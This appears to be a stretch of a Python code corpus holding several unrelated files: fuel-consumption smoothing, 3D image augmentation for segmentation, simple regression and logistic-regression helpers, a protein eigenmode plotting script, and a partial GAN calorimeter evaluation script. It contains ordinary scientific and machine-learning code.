update_low(refuelings,i,_get_average(refuelings,i-1),convergence_speed + (1-convergence_speed) * 0.5,tank_size)
def update_high(refuelings,i,avg,convergence_speed,tank_size):
desired_rest = (-1.0 * avg * (refuelings[i+1].odo-refuelings[i].odo))+refuelings[i].liters+refuelings[i].rest_liters
desired_rest = refuelings[i+1].rest_liters + (convergence_speed * (desired_rest-refuelings[i+1].rest_liters))
refuelings[i+1].rest_liters = _get_within_bounds(0,tank_size-refuelings[i+1].liters,desired_rest)
def update_low(refuelings,i,avg,convergence_speed,tank_size):
desired_rest = (avg * (refuelings[i+1].odo-refuelings[i].odo))-refuelings[i].liters+refuelings[i+1].rest_liters
desired_rest = refuelings[i].rest_liters + (convergence_speed * (desired_rest-refuelings[i].rest_liters))
refuelings[i].rest_liters = _get_within_bounds(0,tank_size-refuelings[i].liters,desired_rest)
def _get_average(refuelings, i):
return (refuelings[i].liters + refuelings[i].rest_liters - refuelings[i+1].rest_liters) / (refuelings[i+1].odo - refuelings[i].odo)
def _get_within_bounds(min_val, max_val, val):
return float(min(max_val,max(min_val,val)))
for i in xrange(4):
smooth_forward(refuelings,1.0/(i+1.0))
smooth_backward(refuelings,1.0/(i+1.0))
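
# Hedged usage sketch (not part of the original module): run_restliter_algo only needs
# objects exposing odo, liters and rest_liters, so a small stand-in record class lets the
# smoothing be exercised without the datastore-backed fuel.Refueling model. The odometer
# and litre values below are illustrative only.
class _FakeRefueling(object):
    def __init__(self, odo, liters):
        self.odo = odo
        self.liters = liters
        self.rest_liters = 0.0

def _demo_restliter_algo():
    rows = [_FakeRefueling(0, 0.0), _FakeRefueling(400, 30.0),
            _FakeRefueling(850, 35.0), _FakeRefueling(1300, 33.0)]
    run_restliter_algo(rows)
    # returns the smoothed estimate of fuel left in the tank at each refueling
    return [round(r.rest_liters, 2) for r in rows]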
|
StarcoderdataPython
|
1741940
|
<filename>src/augment.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 21 15:30:54 2019
@author: paskali
"""
"""
Train images augmentation.
Load images and binary masks from train folder, and apply various methods
for transformation. Finally save them in the train folder.
"""
import random, time, csv, os
import numpy as np
import elasticdeform
from scipy import ndimage
import tensorflow as tf
def rotation(image, mask):
"""
Apply rotation to image and binary mask.
Parameters
----------
image : numpy array
3D numpy array of image.
mask : numpy array
3D numpy array of binary mask.
Returns
-------
numpy array, numpy array
rotated image and binary mask.
"""
angle = np.random.randint(-20,20)
return _fix_image_size(ndimage.rotate(image, angle, cval=image.min()), image.shape), _fix_image_size(ndimage.rotate(mask, angle), mask.shape)
def elastic_deform(image, mask, sigma=4):
"""
Apply transversal elastic deformation to each slide of image
and binary mask. Then save them to corresponding image_path and mask_path.
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
sigma : int
used for elastic deformation. The default is 4.
lower value for images with lower resolution, could be higher for images
with higher resolution.
E.g.:
3-4 sigma for resolution of 128 x 128
15-20 sigma for resolution of 512 x 512
Returns
-------
numpy array, numpy array
deformed image and binary mask.
"""
# Sigma 20 is okay for (512,512), but for lower resolution it should be lower.
# Use 3 for smoother deformation, and 5 for stronger.
image, mask = elasticdeform.deform_random_grid([image, mask], sigma=sigma, points=3, cval=image.min(), prefilter=False, axis=(0,1))
mask = np.where(mask != 1, 0, 1)
return image, mask
def random_zoom(image, mask):
"""
Randomly resize image and binary mask by zoom factor in range from 0.8 to 1.2
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
resized image and binary mask.
"""
zoom = np.random.uniform(0.8, 1.2)
return _fix_image_size(ndimage.zoom(image, zoom), image.shape), _fix_image_size(ndimage.zoom(mask, zoom), mask.shape)
def random_shift(image, mask):
"""
Randomly shift image and binary mask in range X = [-10,10] and Y = [-10,10]
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
shifted image and binary mask.
"""
x_shift, y_shift, z_shift = (np.random.randint(-10,10), np.random.randint(-10,10), 0)
    return _fix_image_size(ndimage.shift(image, (x_shift, y_shift, z_shift)), image.shape), _fix_image_size(ndimage.shift(mask, (x_shift, y_shift, z_shift)), mask.shape)
def mean_filter(image, mask):
'''
Apply mean filter.
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
shifted image and binary mask.
'''
return ndimage.uniform_filter(image, size=(3,3,3)), mask
def median_filter(image, mask):
'''
Apply median filter.
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
shifted image and binary mask.
'''
return ndimage.median_filter(image, size=(3,3,3)), mask
def gauss_filter(image, mask):
'''
Apply gaussian filter.
Parameters
----------
image : nparray
3D nparray of image.
mask : nparray
3D nparray of binary mask.
Returns
-------
numpy array, numpy array
shifted image and binary mask.
'''
return ndimage.gaussian_filter(image, sigma=1), mask
def _fix_image_size(image, target_size):
"""
Crop 3D image to target size. If any axis size is lower than
target size, add padding to reach target size.
Parameters
----------
image : nparray
3D nparray.
target_size : tuple
tuple with value for every axis.
Returns
-------
nparray
cropped image with target size.
"""
org_x, org_y, org_z = image.shape
target_x, target_y, target_z = target_size
if target_x > org_x:
modulo = (target_x - org_x) % 2
offset = (target_x - org_x) // 2
image = np.pad(image, ((offset, offset + modulo),(0,0),(0,0)), mode='constant')
if target_y > org_y:
modulo = (target_y - org_y) % 2
offset = (target_y - org_y) // 2
image = np.pad(image, ((0,0),(offset, offset + modulo),(0,0)), mode='constant')
if target_z > org_z:
modulo = (target_z - org_z) % 2
offset = (target_z - org_z) // 2
image = np.pad(image, ((0,0),(0,0),(offset, offset + modulo)), mode='constant')
org_x, org_y, org_z = image.shape
off_x, off_y, off_z = (org_x - target_x)//2, (org_y - target_y)//2, (org_z - target_z)//2
minx, maxx = off_x, target_x + off_x
miny, maxy = off_y, target_y + off_y
minz, maxz = off_z, target_z + off_z
return image[minx:maxx, miny:maxy, minz:maxz]
def augment_generator_probability(train_ds, factor, rotate_p, deform_p, filters_p, epochs,
mean_filter_p=0.33, median_filter_p=0.33, gauss_filter_p=0.33):
"""
Generator that yields augmented images. The augmentation is performed according to
probability values, increasing the dataset by defined factor.
Saves a report of augmentation in /logs directory.
Parameters
----------
train_ds : tuple
tuple containing image and binary mask.
factor : int
the factor by which the sample will be increased (E.g. final sample size = factor * train sample size).
rotate_p : float
the probability of rotation.
deform_p : float
the probability of deformation.
filters_p : float
the probability to apply filters.
epochs : int
the number of sets of images to be generated.
    mean_filter_p : float, optional
        The probability to apply mean filter. The default is 0.33.
    median_filter_p : float, optional
        The probability to apply median filter. The default is 0.33.
    gauss_filter_p : float, optional
        The probability to apply gaussian filter. The default is 0.33.
Yields
------
image : tensor
tensor of the image.
mask : tensor
tensor of the mask.
"""
if not os.path.exists("./logs"):
os.mkdir("logs")
log_name = f'logs/aug_{time.strftime("%Y%m%d%H%M",time.localtime())}.log'
with open(log_name, 'w', newline='') as csvfile:
fieldnames = ['rotate', 'deform', 'filters', 'filter']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for _ in range(epochs):
for x, y in train_ds:
for i in range(factor):
inst={'rotate':'off',
'deform':'off',
'filters':'off',
'filter':'no'}
image, mask = x, y
if random.random() < rotate_p:
image, mask = rotation(image, mask)
inst['rotate'] = 'on'
if random.random() < deform_p:
image, mask = elastic_deform(image, mask)
inst['deform'] = 'on'
if random.random() < filters_p:
inst['filters'] = 'on'
chance = random.random()
if chance < mean_filter_p:
image, mask = mean_filter(image, mask)
inst['filter'] = 'mean'
elif chance < mean_filter_p + median_filter_p:
inst['filter'] = 'median'
image, mask = median_filter(image, mask)
else:
inst['filter'] = 'gauss'
image, mask = gauss_filter(image, mask)
with open(log_name, 'a') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=list(inst.keys()))
writer.writerow(inst)
image = np.reshape(image, image.shape + (1,))
mask = np.reshape(mask, mask.shape + (1,))
image = np.reshape(image, (1,) + image.shape)
mask = np.reshape(mask, (1,) + mask.shape)
image = tf.convert_to_tensor(image)
mask = tf.convert_to_tensor(mask)
yield image, mask
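
# Hedged usage sketch (not part of the original script): feed one in-memory (image, mask)
# volume pair through the probabilistic augmentation generator. The shapes, probabilities
# and seed below are illustrative only; the generator writes a small CSV report to ./logs.
if __name__ == '__main__':
    np.random.seed(0)
    volume = np.random.rand(64, 64, 64).astype(np.float32)
    binary_mask = (volume > 0.5).astype(np.float32)
    train_ds = [(volume, binary_mask)]
    gen = augment_generator_probability(train_ds, factor=2, rotate_p=0.5,
                                        deform_p=0.5, filters_p=0.5, epochs=1)
    for image_t, mask_t in gen:
        print(image_t.shape, mask_t.shape)  # TensorShape([1, 64, 64, 64, 1]) each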
|
StarcoderdataPython
|
55825
|
<reponame>mlyundin/Machine-Learning
import numpy as np
def load_data(file_name):
data = np.loadtxt(file_name, delimiter=',')
X = data[:, :-1]
y = data[:, -1:]
return X, y
def transform_arguments(tranformation):
def dec(f):
def wrapper(*args, **kwargs):
t_args = map(tranformation, args)
t_kwargs = {k: tranformation(v) for k, v in kwargs.iteritems()}
return f(*t_args, **t_kwargs)
return wrapper
return dec
matrix_args = transform_arguments(lambda arg: np.matrix(arg, copy=False))
matrix_args_array_only = transform_arguments(lambda arg: np.matrix(arg, copy=False) if isinstance(arg, np.ndarray) else arg)
@matrix_args
def J_liner_regression(X, y, theta):
temp = X*theta - y
return (temp.T*temp/(2*len(y)))[0, 0]
@matrix_args_array_only
def gradient_descent(cost_function, X, y, iterations, intial_theta, alpha):
m = len(y)
theta = intial_theta
J_history = []
for _ in xrange(iterations):
theta = theta - (alpha/m)*X.T*(X * theta - y)
J_history.append(cost_function(X, y, theta))
return theta, J_history
def add_zero_feature(X, axis=1):
return np.append(np.ones((X.shape[0], 1) if axis else (1, X.shape[1])), X, axis=axis)
def sigmoid(z):
return 1/(1+np.exp(-z))
def lr_accuracy(X, y, theta):
theta = theta[:, np.newaxis]
temp = sigmoid(np.dot(X, theta)).ravel()
p = np.zeros(len(X))
p[temp >= 0.5] = 1
return np.mean(p == y.ravel())*100
@matrix_args
def cf_lr(theta, X, y):
theta = theta.T
m = len(y)
Z = sigmoid(X*theta)
J = (-y.T*np.log(Z) - (1-y).T*np.log(1-Z))/m
return J[0, 0]
@matrix_args
def gf_lr(theta, X, y):
theta = theta.T
m = len(y)
res = (X.T*(sigmoid(X*theta)-y))/m
return res.A1
@matrix_args_array_only
def cf_lr_reg(theta, X, y, lambda_coef):
theta = theta.T
m = len(y)
lambda_coef = float(lambda_coef)
Z = sigmoid(X*theta)
J = (-y.T * np.log(Z) - (1-y).T * np.log(1-Z))/m + (lambda_coef/(2 * m))*theta.T*theta
return J[0, 0]
@matrix_args_array_only
def gf_lr_reg(theta, X, y, lambda_coef):
theta = np.matrix(theta.T, copy=True)
lambda_coef = float(lambda_coef)
m = len(y)
Z = X*theta
theta[0, 0] = 0
res = (X.T*(sigmoid(Z)-y))/m + (lambda_coef/m)*theta
return res.A1
def feature_normalize(X):
mu = np.mean(X, axis=0)[np.newaxis, :]
sigma = np.std(X, axis=0)[np.newaxis, :]
return mu, sigma, (X-mu)/sigma
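
# Hedged usage sketch (not part of the original module, Python 2 like the code above):
# gradient descent on a tiny synthetic linear-regression problem. The data values and
# learning rate are illustrative only.
if __name__ == '__main__':
    X = np.array([[1.0], [2.0], [3.0], [4.0]])
    y = np.array([[2.0], [4.0], [6.0], [8.0]])
    mu, sigma, X_norm = feature_normalize(X)
    X_b = add_zero_feature(X_norm)
    theta, J_history = gradient_descent(J_liner_regression, X_b, y, 200,
                                        np.zeros((2, 1)), 0.1)
    print theta          # approx. intercept 5.0 and slope ~2.24 on the normalized feature
    print J_history[-1]  # cost should be close to zero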
|
StarcoderdataPython
|
1611422
|
<gh_stars>1-10
'''
Created on Jul 9, 2014
@author: oliwa
'''
import sys
import glob
import os
from scriptutils import makeStringEndWith, mkdir_p
import argparse
import numpy as np
import traceback
#import pylab
import matplotlib
matplotlib.use('Agg')
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
import numpy as np
from scriptutils import makeStringNotEndWith
def main():
parser = argparse.ArgumentParser(description='Visualize eigenvalues and overlaps')
parser.add_argument('resultsPath', help='Absolute path of the results folders')
parser.add_argument('outputPath', help='outputPath')
parser.add_argument('-title', help='title of the plot')
parser.add_argument('-fileToLookFor_overlap', help='Specify the file with the overlap information')
parser.add_argument('-fileToLookFor_differencesInRank', help='Specify the file with the differencesInRank information')
parser.add_argument('-modes', help='Specify how many modes to plot')
parser.add_argument('-upperOverlapLimit', help='Upper overlap limit, force manually')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
if args.modes:
modes = int(args.modes)
else:
modes = 4
if args.title:
title = args.title
else:
title = ""
if args.outputPath:
outputPath = args.outputPath
else:
outputPath = ""
fileToLookFor_overlap = "singleModeOverlapsFromSuperset.txt"
fileToLookFor_differencesInRank = "differencesInRank.txt"
if args.fileToLookFor_overlap:
        fileToLookFor_overlap = args.fileToLookFor_overlap
if args.fileToLookFor_differencesInRank:
fileToLookFor_differencesInRank = args.fileToLookFor_differencesInRank
assert os.path.isdir(args.resultsPath)
assert os.path.isdir(args.outputPath)
all340proteinsPaths = glob.glob(args.resultsPath+"*/")
difficults = np.loadtxt("/home/oliwa/workspace/TNMA1/src/BenchmarkAssessmentsOfDifficulty/allinterfaceSuperposed/difficult.txt", dtype="string")
difficults = set(difficults)
dataToPlot_overlaps = []
dataToPlot_differencesInRank = []
proteins = []
counter = 0
for proteinPath in sorted(all340proteinsPaths):
proteinPath = makeStringEndWith(proteinPath, "/")
protein = makeStringNotEndWith(os.path.basename(os.path.normpath(proteinPath)), "/")
if protein not in difficults:
continue
counter += 1
try:
# load overlap
overlap = np.loadtxt(proteinPath+fileToLookFor_overlap)
overlap = overlap[:modes]
overlap = abs(np.array(overlap))
overlap = list(overlap)
if args.upperOverlapLimit:
for i in range(0, len(overlap)):
if overlap[i] > float(args.upperOverlapLimit):
overlap[i] = float(args.upperOverlapLimit)
dataToPlot_overlaps.append(overlap)
protein = os.path.basename(os.path.normpath(proteinPath))
proteins.append(protein)
# load ranking differences
differenceInRank = np.loadtxt(proteinPath+fileToLookFor_differencesInRank, dtype="int")
differenceInRank = list(differenceInRank)
dataToPlot_differencesInRank.append(differenceInRank[:modes])
except IOError as err:
print "IOError occurred, probably there is no such file at the path: ", err
print traceback.format_exc()
print proteins
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
#x, y = np.random.rand(2, 100) * 4
y = range(1, len(proteins)+1)
x = range(1, modes+1)
xpos, ypos = np.meshgrid(x, y)
x = xpos.flatten()
y = ypos.flatten()
colors = []
print "overlaps len: ", len(dataToPlot_overlaps)
print "overlaps: ", dataToPlot_overlaps
dataToPlot_overlaps_flattened = np.array(dataToPlot_overlaps).flatten()
maxOverlap = max(dataToPlot_overlaps_flattened)
print "maxOverlap:", maxOverlap
for element in dataToPlot_overlaps_flattened:
colors.append(plt.cm.jet(element/maxOverlap))
#print plt.cm.jet(element/maxOverlap)
print "x", len(x)
print "y", len(y)
#print "colors", len(colors)
print "dataToPlot_differencesInRank len: ",dataToPlot_differencesInRank
dataToPlot_differencesInRank = np.array(dataToPlot_differencesInRank).flatten() + 0.0001
print "dataToPlot_differencesInRank len: ", len(dataToPlot_differencesInRank.flatten())
dx=np.ones(len(x))*0.5
dy=dx
p = ax.bar3d(x-0.25, y-0.25, np.zeros(len(x)), dx, dy, dataToPlot_differencesInRank, color=colors, zsort='average')
ax.set_zlim([min(dataToPlot_differencesInRank), max(dataToPlot_differencesInRank)])
#ax.set_title(title)
# x label for the ascending modes
#ax.set_xticklabels(range(1, modes+1), minor=False)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
ax.set_xlabel("ascending lambda^R modes")
# y label for the proteins
#ax.set_yticklabels(proteins, minor=False)
plt.gca().yaxis.set_major_locator(plt.NullLocator())
ax.set_ylabel("proteins")
# # dataToPlot_overlaps = np.array(dataToPlot_overlaps)
# #
# # fig, ax = plt.subplots(1)
# # ax.set_yticklabels(proteins, minor=False)
# # ax.xaxis.tick_top()
# #
# # p = ax.pcolormesh(dataToPlot_overlaps, cmap="bone")
# # fig.colorbar(p)
# #
# # # put the major ticks at the middle of each cell, notice "reverse" use of dimension
# # ax.set_yticks(np.arange(dataToPlot_overlaps.shape[0])+0.5, minor=False)
# # ax.set_xticks(np.arange(dataToPlot_overlaps.shape[1])+0.5, minor=False)
# #
# # # want a more natural, table-like display (sorting)
# # ax.invert_yaxis()
# # ax.xaxis.tick_top()
# #
# # ax.set_xticklabels(range(1, modes+1), minor=False)
# # ax.set_yticklabels(proteins, minor=False)
# #
# # if args.title:
# # plt.title(args.title+"\n\n")
# output
#outputPath = makeStringEndWith(args.outputPath, "/")+"eigenVis"
#mkdir_p(outputPath)
plt.savefig(outputPath+'/eigenVis_'+title+'.eps', bbox_inches='tight')
plt.savefig(outputPath+'/eigenVis_'+title+'.pdf', bbox_inches='tight')
#plt.show()
# close and reset the plot
plt.clf()
plt.cla()
plt.close()
print "total proteins: ", counter
if __name__ == '__main__':
main()
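
# Hedged usage note (not part of the original script); the script name and paths below are
# placeholders only:
#   python visualize_eigen.py /path/to/results/ /path/to/output/ -title run1 -modes 4
# Each results subfolder is expected to contain the singleModeOverlapsFromSuperset.txt and
# differencesInRank.txt files read in main().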
|
StarcoderdataPython
|
3307230
|
import os, h5py
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib.colors import LogNorm, Normalize
plt.switch_backend('Agg')
import time
from vegan import discriminator as build_discriminator
from vegan import generator as build_generator
#Get VEGAN params
gen_weights='maelin50_full/params_generator_epoch_049.hdf5'
disc_weights='maelin50_full/params_discriminator_epoch_049.hdf5'
#gen_weights='full_maelin30/params_generator_epoch_029.hdf5'
#disc_weights='full_maelin30/params_discriminator_epoch_029.hdf5'
latent_space =200
num_events=1000
# Other params
save = 1
get_actual = 1
filename10 = 'Gen_full_10.h5'
filename50 = 'Gen_full_50.h5'
filename100 = 'Gen_full_100.h5'
filename150 = 'Gen_full_150.h5'
filename200 = 'Gen_full_200.h5'
filename300 = 'Gen_full_300.h5'
filename400 = 'Gen_full_400.h5'
filename500 = 'Gen_full_500.h5'
## Get Full data
if (get_actual):
d=h5py.File("/eos/project/d/dshep/LCD/FixedEnergy/Ele_10GeV/Ele_10GeV_0.h5",'r')
c=np.array(d.get('ECAL'))
e=d.get('target')
X10=np.array(c[:num_events])
y=np.array(e[:num_events,1])
Y10=np.expand_dims(y, axis=-1)
print X10.shape
print Y10.shape
X10[X10 < 1e-6] = 0
d=h5py.File("/eos/project/d/dshep/LCD/FixedEnergy/Ele_50GeV/Ele_50GeV_0.h5",'r')
c=np.array(d.get('ECAL'))
e=d.get('target')
X50=np.array(c[:num_events])
y=np.array(e[:num_events,1])
Y50=np.expand_dims(y, axis=-1)
X50[X50 < 1e-6] = 0
d=h5py.File("/eos/project/d/dshep/LCD/FixedEnergy/Ele_100GeV/Ele_100GeV_0.h5",'r')
c=np.array(d.get('ECAL'))
e=d.get('target')
X100=np.array(c[:num_events])
y=np.array(e[:num_events,1])
Y100=np.expand_dims(y, axis=-1)
X100[X100 < 1e-6] = 0
d=h5py.File("/eos/project/d/dshep/LCD/FixedEnergy/Ele_200GeV/Ele_200GeV_0.h5",'r')
c=np.array(d.get('ECAL'))
e=d.get('target')
X200=np.array(c[:num_events])
y=np.array(e[:num_events,1])
Y200=np.expand_dims(y, axis=-1)
X200[X200 < 1e-6] = 0
# Histogram Functions
def plot_max(array, index, out_file, num_fig, energy):
## Plot the Histogram of Maximum energy deposition location on all axis
bins = np.arange(0, 25, 1)
plt.figure(num_fig)
plt.subplot(221)
plt.title('X-axis')
plt.hist(array[0:index-1, 0], bins=bins, histtype='step', label= str(energy))
plt.legend()
plt.ylabel('Events')
plt.subplot(222)
plt.title('Y-axis')
plt.hist(array[0:index-1, 1], bins=bins, histtype='step', label=str(energy))
plt.legend()
plt.xlabel('Position')
plt.subplot(223)
plt.hist(array[0:index-1, 2], bins=bins, histtype='step', label=str(energy))
plt.legend(loc=1)
plt.xlabel('Position')
plt.ylabel('Events')
plt.savefig(out_file)
def plot_energy(array, index, out_file, num_fig, energy):
### Plot Histogram of energy flat distribution along all three axis
plt.figure(num_fig)
plt.subplot(221)
plt.title('X-axis')
plt.hist(array[:index, 0].flatten(), bins='auto', histtype='step', label=str(energy))
plt.legend()
plt.ylabel('Events')
plt.subplot(222)
plt.title('Y-axis')
plt.hist(array[:index, 1].flatten(), bins='auto', histtype='step', label=str(energy))
plt.legend()
plt.xlabel('ECAL Cell Energy')
plt.subplot(223)
plt.hist(array[:index, 2].flatten(), bins='auto', histtype='step', label=str(energy))
plt.legend()
plt.ylabel('Events')
plt.savefig(out_file)
def plot_energy2(array, index, out_file, num_fig, energy, color='blue', style='-'):
### Plot Histogram of energy
plt.figure(num_fig)
ebins=np.arange(0, 500, 5)
label= energy + ' {:.2f}'.format(np.mean(array))+ ' ( {:.2f}'.format(np.std(array)) + ' )'
plt.hist(array, bins=ebins, histtype='step', label=label, color=color, ls=style)
plt.xticks([0, 10, 50, 100, 150, 200, 300, 400, 500])
plt.xlabel('Energy GeV')
plt.ylabel('Events')
plt.legend(title=' Mean (std)', loc=0)
plt.savefig(out_file)
def plot_energy_hist(array, index, out_file, num_fig, energy):
### Plot total energy deposition cell by cell along x, y, z axis
plt.figure(num_fig)
plt.subplot(221)
plt.title('X-axis')
plt.plot(array[0:index, 0].sum(axis = 0)/index, label=str(energy))
plt.ylabel('ECAL Energy/Events')
plt.legend()
plt.subplot(222)
plt.title('Y-axis')
plt.plot(array[0:index, 1].sum(axis = 0)/index, label=str(energy))
plt.legend()
plt.xlabel('Position')
plt.subplot(223)
plt.title('Z-axis')
plt.plot(array[0:index, 2].sum(axis = 0)/index, label=str(energy))
plt.legend()
plt.xlabel('Position')
plt.ylabel('ECAL Energy/Events')
plt.savefig(out_file)
def plot_energy_mean(array, index, out_file, num_fig, energy):
### Plot total energy deposition cell by cell along x, y, z axis
plt.figure(num_fig)
plt.subplot(221)
plt.title('X-axis')
plt.plot(array[0:index, 0].mean(axis = 0), label=str(energy))
plt.legend()
plt.ylabel('Mean Energy')
plt.subplot(222)
plt.title('Y-axis')
plt.plot(array[0:index, 1].mean(axis = 0), label=str(energy))
plt.legend()
plt.xlabel('Position')
plt.subplot(223)
plt.title('Z-axis')
plt.plot(array[0:index, 2].mean(axis = 0), label=str(energy))
plt.xlabel('Position')
plt.legend()
plt.ylabel('Mean Energy')
plt.savefig(out_file)
def plot_real(array, index, out_file, num_fig, energy):
## Plot the disc real/fake flag
plt.figure(num_fig)
bins = np.arange(0, 1, 0.01)
plt.figure(num_fig)
plt.title('Real/ Fake')
plt.hist(array[0:index-1, 0], bins=bins, histtype='step', label= str(energy))
plt.legend()
plt.ylabel('Events')
plt.xlabel('Real/fake')
plt.savefig(out_file)
def plot_error(array1, array2, index, out_file, num_fig, energy, pos=2):
# plot error
plt.figure(num_fig)
bins = np.linspace(-100, 100, 30)
label= energy + ' {:.2f} '.format(np.multiply(100, np.mean(np.absolute(array1-array2)))) + ' ( {:.2f}'.format(np.multiply(100, np.std(array1-array2)))+ ' )'
plt.hist(np.multiply(100, array1-array2), bins=bins, histtype='step', label=label)
plt.xlabel('error GeV')
plt.ylabel('Number of events')
plt.legend(title=' Mean ( std )', loc=pos)
plt.savefig(out_file)
def plot_ecal(array, index, out_file, num_fig, energy):
# plot ecal sum
bins = np.linspace(0, 11, 50)
plt.figure(num_fig)
plt.title('ECAL SUM')
plt.xlabel('ECAL SUM')
plt.ylabel('Events')
plt.hist(np.sum(array, axis=(1, 2, 3)), bins=bins, histtype='step', label=energy)
plt.legend(loc=0)
plt.savefig(out_file)
# Initialization of parameters
index10 = num_events
index50 = num_events
index100 = num_events
index150 = num_events
index200 = num_events
index300 = num_events
index400 = num_events
index500 = num_events
#Initialization of arrays for actual events
events_act10 = np.zeros((num_events, 25, 25, 25))
max_pos_act_10 = np.zeros((num_events, 3))
events_act50 = np.zeros((num_events, 25, 25, 25))
max_pos_act_50 = np.zeros((num_events, 3))
events_act100 = np.zeros((num_events, 25, 25, 25))
max_pos_act_100 = np.zeros((num_events, 3))
events_act200 = np.zeros((num_events, 25, 25, 25))
max_pos_act_200 = np.zeros((num_events, 3))
sum_act10 = np.zeros((num_events, 3, 25))
sum_act50 = np.zeros((num_events, 3, 25))
sum_act100 = np.zeros((num_events, 3, 25))
sum_act200 = np.zeros((num_events, 3, 25))
energy_sampled10 = np.multiply(0.1, np.ones((num_events, 1)))
energy_sampled50 = np.multiply(0.5, np.ones((num_events, 1)))
energy_sampled100 = np.ones((num_events, 1))
energy_sampled150 = np.multiply(1.5, np.ones((num_events, 1)))
energy_sampled200 = np.multiply(2, np.ones((num_events, 1)))
energy_sampled300 = np.multiply(3, np.ones((num_events, 1)))
energy_sampled400 = np.multiply(4, np.ones((num_events, 1)))
energy_sampled500 = np.multiply(5, np.ones((num_events, 1)))
energy_act10 = np.zeros((num_events, 1))
energy_act50 = np.zeros((num_events, 1))
energy_act100 = np.zeros((num_events, 1))
energy_act200 = np.zeros((num_events, 1))
energy_act300 = np.zeros((num_events, 1))
#Initialization of arrays for generated images
events_gan10 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_10 = np.zeros((num_events, 3))
events_gan50 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_50 = np.zeros((num_events, 3))
events_gan100 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_100 = np.zeros((num_events, 3))
events_gan150 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_150 = np.zeros((num_events, 3))
events_gan200 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_200 = np.zeros((num_events, 3))
events_gan300 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_300 = np.zeros((num_events, 3))
events_gan400 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_400 = np.zeros((num_events, 3))
events_gan500 = np.zeros((num_events, 25, 25, 25))
max_pos_gan_500 = np.zeros((num_events, 3))
sum_gan10 = np.zeros((num_events, 3, 25))
sum_gan50 = np.zeros((num_events, 3, 25))
sum_gan100 = np.zeros((num_events, 3, 25))
sum_gan150 = np.zeros((num_events, 3, 25))
sum_gan200 = np.zeros((num_events, 3, 25))
sum_gan300 = np.zeros((num_events, 3, 25))
sum_gan400 = np.zeros((num_events, 3, 25))
sum_gan500 = np.zeros((num_events, 3, 25))
energy_gan10 = np.zeros((num_events, 1))
energy_gan50 = np.zeros((num_events, 1))
energy_gan100 = np.zeros((num_events, 1))
energy_gan150 = np.zeros((num_events, 1))
energy_gan200 = np.zeros((num_events, 1))
energy_gan300 = np.zeros((num_events, 1))
energy_gan400 = np.zeros((num_events, 1))
energy_gan500 = np.zeros((num_events, 1))
### Get Generated Data
## events for 10 GeV
g = build_generator(latent_space, return_intermediate=False)
g.load_weights(gen_weights)
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled10
generator_in = np.multiply(sampled_labels, noise)
start = time.time()
generated_images10 = g.predict(generator_in, verbose=False, batch_size=100)
end = time.time()
gen_time = end - start
print generated_images10.shape
print gen_time
d = build_discriminator()
d.load_weights(disc_weights)
start =time.time()
isreal10, aux_out10 = np.array(d.predict(generated_images10, verbose=False, batch_size=100))
end = time.time()
disc_time = end - start
generated_images10 = np.squeeze(generated_images10)
print generated_images10.shape
print disc_time
## events for 50 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled50
generator_in = np.multiply(sampled_labels, noise)
generated_images50 = g.predict(generator_in, verbose=False, batch_size=100)
isreal50, aux_out50 = np.array(d.predict(generated_images50, verbose=False, batch_size=100))
generated_images50 = np.squeeze(generated_images50)
## events for 100 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled100
generator_in = np.multiply(sampled_labels, noise)
generated_images100 = g.predict(generator_in, verbose=False, batch_size=100)
isreal100, aux_out100 = np.array(d.predict(generated_images100, verbose=False, batch_size=100))
generated_images100 = np.squeeze(generated_images100)
## events for 150 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled150
generator_in = np.multiply(sampled_labels, noise)
generated_images150 = g.predict(generator_in, verbose=False, batch_size=100)
isreal150, aux_out150 = np.array(d.predict(generated_images150, verbose=False, batch_size=100))
generated_images150 = np.squeeze(generated_images150)
## events for 200 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled200
generator_in = np.multiply(sampled_labels, noise)
generated_images200 = g.predict(generator_in, verbose=False, batch_size=100)
isreal200, aux_out200 = np.array(d.predict(generated_images200, verbose=False, batch_size=100))
generated_images200 = np.squeeze(generated_images200)
## events for 300 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled300
generator_in = np.multiply(sampled_labels, noise)
generated_images300 = g.predict(generator_in, verbose=False, batch_size=100)
isreal300, aux_out300 = np.array(d.predict(generated_images300, verbose=False, batch_size=100))
generated_images300 = np.squeeze(generated_images300)
## events for 400 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled400
generator_in = np.multiply(sampled_labels, noise)
generated_images400 = g.predict(generator_in, verbose=False, batch_size=100)
isreal400, aux_out400 = np.array(d.predict(generated_images400, verbose=False, batch_size=100))
generated_images400 = np.squeeze(generated_images400)
## events for 500 GeV
noise = np.random.normal(0, 1, (num_events, latent_space))
sampled_labels = energy_sampled500
generator_in = np.multiply(sampled_labels, noise)
